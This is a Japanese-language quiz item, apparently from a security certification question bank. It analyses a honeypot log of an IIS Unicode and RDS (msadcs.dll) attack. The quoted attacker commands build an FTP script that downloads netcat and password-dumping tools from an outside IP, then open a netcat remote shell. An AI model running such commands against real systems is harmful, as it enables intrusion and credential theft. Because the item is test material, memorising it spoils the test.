質問341
以下の抜粋は、lab.wiretrip.netでホストされていたハニーポットのログから抜粋したものです。Snort は、213.116.251.162 からの Unicode 攻撃を報告しました。ファイルパーミッションの正規化の脆弱性(UNICODE攻撃)により、通常はスクリプトを実行する権利を持っていない任意のフォルダでスクリプトが実行される可能性があります。攻撃者は Unicode 攻撃を試み、最終的に boot.ini の表示に成功する。
そして、msadcs.dllを経由してRDSで遊ぶことに切り替える。RDSの脆弱性により、悪意のあるユーザーはIISサーバー上でシェルコマンド(CMD.EXEなど)を実行するSQL文を構築することができる。攻撃者は、簡単なクエリを実行してディレクトリが存在することを発見し、msadcs.dllへのクエリで正しく機能していることを確認する。攻撃者はRDSクエリを実行し、以下のようなコマンドを実行します。
"cmd1.exe /c open 213.116.251.162 >ftpcom"
"cmd1.exe /c echo johna2k >>ftpcom"
"cmd1.exe /c echo haxedj00 >>ftpcom"
"cmd1.exe /c echo get nc.exe >>ftpcom"
"cmd1.exe /c echo get pdump.exe >>ftpcom"
"cmd1.exe /c echo get samdump.dll >>ftpcom"
"cmd1.exe /c echo quit >>ftpcom"
"cmd1.exe /c ftp -s:ftpcom"
"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"
与えられた搾取から何が推測できますか?